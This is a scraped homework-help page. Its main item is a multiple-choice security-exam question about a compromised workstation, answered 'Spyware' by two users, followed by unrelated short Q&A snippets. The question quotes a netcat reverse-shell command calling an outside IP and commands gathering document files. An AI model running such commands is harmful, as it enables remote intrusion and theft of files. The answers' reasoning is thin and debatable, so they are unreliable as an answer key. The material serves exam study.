1answer.
Ask question
Login Signup
Ask question
All categories
  • English
  • Mathematics
  • Social Studies
  • Business
  • History
  • Health
  • Geography
  • Biology
  • Physics
  • Chemistry
  • Computers and Technology
  • Arts
  • World Languages
  • Spanish
  • French
  • German
  • Advanced Placement (AP)
  • SAT
  • Medicine
  • Law
  • Engineering
Fantom [35]
4 years ago
7

A security analyst believes an employee's workstation has been compromised. The analyst reviews the system logs, but does not fi

nd any attempted logins. The analyst then runs the diff command, comparing the C:\windows\System32 directory and the installed cache directory. The Analyst finds a series of files that look suspicious.One of the files contains the following commands:Cmd /c $TEMP$\nc -e cmd.exe 34.100.43.230Copy *.doc> $TEMP$\docfiles.zipCopy *.xls> $TEMP$\xlsfiles.zipCopy *.pdf> $TEMP$\pdffiles.zipWhich of the following types of malware was used?A.WormB.SpywareC.Logic bombD.Backdoor
Computers and Technology
2 answers:
Jobisdone [24]4 years ago
5 0

Answer:

B) Spyware

Explanation:

The definition of the spyware program is a malware that collects information from a computer and then transmits this information to an external entity without the knowledge or consent of the computer owner.

Characteristics of a spyware:

  • It runs without the knowledge or authorization of the owner or user of the infected computer and performs functions on the system that are harmful to the system.
  • How to remove it? Use a reliable malware removal tool, such as the one you can find in good antimalware software.

Antimalware software:  Avast Free Antivirus, Norton, Bitdefender, Panda, Total AV, McAfee, avast, Kaspersky.

Irina18 [472]4 years ago
3 0

Answer:

B

Explanation:

nc was used to copy file

You might be interested in
________ a file transfers a copy of the file from the storage media into your computer memory
frez [133]
Is coping one of the answers? If so, I would say that.
6 0
3 years ago
Assign sub_lyric by slicing rhyme_lyric from start_index to end_index which are given as inputs. Sample output with inputs: 4 7
N76 [4]

sub_lyric = rhyme_lyric[start_index:end_index]

8 0
4 years ago
What are important acronyms we use when we talk about the internet? this is for computer science.
vovangra [49]

Answer:

Lol

Brb

Btw

Gtg

Explanation:

I hope this helps

7 0
3 years ago
Why do people still use Intel HD graphics for gaming?
pogonyaev
People usually do that because they can't afford a gpu or because they don't know anything about a gpu.
8 0
3 years ago
Email is the most common function used in Outlook. Use the drop-down menus to complete the following sentences. By default, the
Olegator [25]
1. Inbox 2. Drafts 3. in the bold font 4. Reading. Hope this helps!
3 0
3 years ago
Read 2 more answers
Other questions:
  • Prompt the user for an automobile service. Each service type is composed of two strings. Output the user's input. (1 pt) Ex: Ent
    9·1 answer
  • The technological advancements allowing for
    10·1 answer
  • To create a unique name for a document before saving to a folder, select _____ on the Office Button menu. a. Save As b. Folder c
    13·2 answers
  • WILL GIVE MEDAL NEED HELP ASAP
    7·1 answer
  • Select the different network functions from the list below.
    10·1 answer
  • Fred has just added DSL service at his home, with a separate DSL modem and consumer-grade router with four Ethernet ports. Fred
    13·1 answer
  • Suppose you were assigned to develop a logical model of the registration system at a school or college. Would you be better off
    12·1 answer
  • Name the part of windows<br> explore window​
    7·2 answers
  • In what Career Cluster you get to design, build, and destroy things
    6·1 answer
  • How to delete account
    12·1 answer
Add answer
Login
Not registered? Fast signup
Signup
Login Signup
Ask question!